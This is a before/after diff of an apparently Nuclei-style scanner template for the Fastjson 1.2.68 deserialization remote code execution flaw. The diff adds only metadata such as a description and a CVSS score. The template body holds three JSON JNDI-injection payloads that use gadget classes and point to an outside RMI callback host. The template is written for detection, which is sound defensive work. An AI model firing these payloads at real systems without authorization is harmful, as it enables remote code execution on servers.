vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml (before)
id: fastjson-1-2-68-rce

info:
  name: Fastjson 1.2.68 Deserialization RCE
  author: zh
  severity: critical
  reference:
    - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
    - https://github.com/wyzxxz/fastjson_rce_tool
  tags: fastjson,rce,deserialization,oast

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"org.apache.shiro.jndi.JndiObjectFactory",
           "resourceName":"rmi://{{interactsh-url}}/Exploit"
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
           "jndiNames":"rmi://{{interactsh-url}}/Exploit"
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
           "metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: status
        negative: true
        status:
          - 200

vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml (after)
id: fastjson-1-2-68-rce

info:
  name: Fastjson 1.2.68 - Remote Code Execution
  author: zh
  severity: critical
  description: |
    Fastjson 1.2.68 is susceptible to a deserialization remote code execution vulnerability.
  reference:
    - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: fastjson,rce,deserialization,oast

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"org.apache.shiro.jndi.JndiObjectFactory",
           "resourceName":"rmi://{{interactsh-url}}/Exploit"
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
           "jndiNames":"rmi://{{interactsh-url}}/Exploit"
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
           "metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: status
        negative: true
        status:
          - 200

# Enhanced by mp on 2022/05/25

vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml (diff)
@@ -1,12 +1,18 @@
 id: fastjson-1-2-68-rce
 
 info:
-  name: Fastjson 1.2.68 Deserialization RCE
+  name: Fastjson 1.2.68 - Remote Code Execution
   author: zh
   severity: critical
+  description: |
+    Fastjson 1.2.68 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
     - https://github.com/wyzxxz/fastjson_rce_tool
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: fastjson,rce,deserialization,oast
 
 requests:
@@ -53,3 +59,5 @@ requests:
         negative: true
         status:
           - 200
+
+# Enhanced by mp on 2022/05/25
